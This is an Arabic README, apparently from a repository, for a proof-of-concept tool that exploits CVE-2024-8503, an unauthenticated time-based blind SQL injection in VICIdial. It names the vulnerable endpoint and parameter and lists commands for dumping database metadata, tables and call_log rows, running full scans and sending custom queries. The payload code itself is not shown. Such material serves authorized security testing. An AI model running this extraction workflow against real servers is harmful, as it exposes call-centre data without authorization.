
إثبات مفهوم (PoC) لحقن SQL أعمى زمني غير مصادق عليه لـ VICIdial CVE-2024-8503، مع استخراج البيانات الوصفية، ومسح قابل للاستئناف، وحدود أمان صارمة.
إثبات مفهوم لحقن SQL أعمى قائم على الوقت بدون مصادقة في نقطة نهاية VERM_AJAX_functions.php الخاصة بـ VICIdial (CVE-2024-8503). هذا المشروع مخصص فقط للاختبارات الأمنية المصرح بها، والتحقق من الصحة، والأغراض التعليمية.
CVE-2024-8503 هي ثغرة حقن SQL غير مصرح بها في VICIdial حيث يمكن لقيمة اسم مستخدم Basic Auth مصممة خصيصًا الوصول إلى منطق استعلام ضعيف في VERM_AJAX_functions.php. يستخدم هذا الإثبات تقنية الاستدلال القائم على الوقت لتأكيد قابلية الاستغلال واستخراج بيانات وصفية محدودة وبيانات جداول بطريقة مضبوطة.
يفرض هذا الإصدار حدودًا صارمة للإثبات:
requestsقم بتثبيت التبعيات:
pip install requests
قم بتشغيل الفحص الذاتي المحلي لتأكيد الإعداد دون إجراء أي طلبات شبكية:
python3 CVE-2024-8503-POC.py --self-check
تشغيل فحص أساسي غير تفاعلي:
python3 CVE-2024-8503-POC.py --url https://target.tld
الوضع التفاعلي هو سير عمل منفصل للاختبار الموجه من قبل المشغل. وهو مفيد عندما تريد تنفيذ مهام الاستخراج خطوة بخطوة يدويًا بدلاً من تشغيل أمر واحد.
python3 CVE-2024-8503-POC.py --url https://target.tld --interactive
تدعم القائمة التفاعلية استخراج البيانات الوصفية، اكتشاف الجداول والأعمدة، الاستخراج اليدوي، الاستخراج التلقائي، الاستعلامات المخصصة، والمسح الكامل القابل للاستئناف.
استخدم هذه الأوامر عندما تريد مهمة محددة دون الدخول إلى القائمة التفاعلية.
استخراج البيانات الوصفية:
python3 CVE-2024-8503-POC.py --url https://target.tld --metadata db_version database db_user
سرد الجداول:
python3 CVE-2024-8503-POC.py --url https://target.tld --list-tables
الحصول على أعمدة جدول:
python3 CVE-2024-8503-POC.py --url https://target.tld --get-columns call_log
استخراج أعمدة محددة:
python3 CVE-2024-8503-POC.py --url https://target.tld --table call_log --columns uniqueid,channel --rows 3
استخراج تلقائي لبيانات الجدول:
python3 CVE-2024-8503-POC.py --url https://target.tld --auto-extract call_log
مسح كامل:
python3 CVE-2024-8503-POC.py --url https://target.tld --full-scan
استعلام مخصص (SELECT فقط):
python3 CVE-2024-8503-POC.py --url https://target.tld --custom-query "SELECT DATABASE()"
خيارات إضافية:
--path لتغيير مسار نقطة النهاية (الافتراضي: /VERM/VERM_AJAX_functions.php)--skip-vuln-check لتخطي الفحص الأولي للتأكيد--export لحفظ النتائج (JSON للبيانات الوصفية/المسح الكامل، CSV لبيانات الجدول)يتم حفظ التقدم تلقائيًا إلى:
.vicidial_scan_state.json
إذا تم اكتشاف فحص سابق، فسيعرض البرنامج النصي استئنافه أو مسح الحالة.
LICENSE مطابق في جذر المستودع؛ يفترض ملف README هذا ترخيص MIT.هذه الأداة مقدمة لأغراض الاختبارات الأمنية المصرح بها والتعليمية فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. يجب عليك الحصول على إذن كتابي صريح قبل اختبار أي أنظمة لا تملكها. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الضرر الناجم عن هذه الأداة.
هذا المشروع مرخص بموجب ترخيص MIT. راجع ملف LICENSE على مستوى المستودع للحصول على التفاصيل.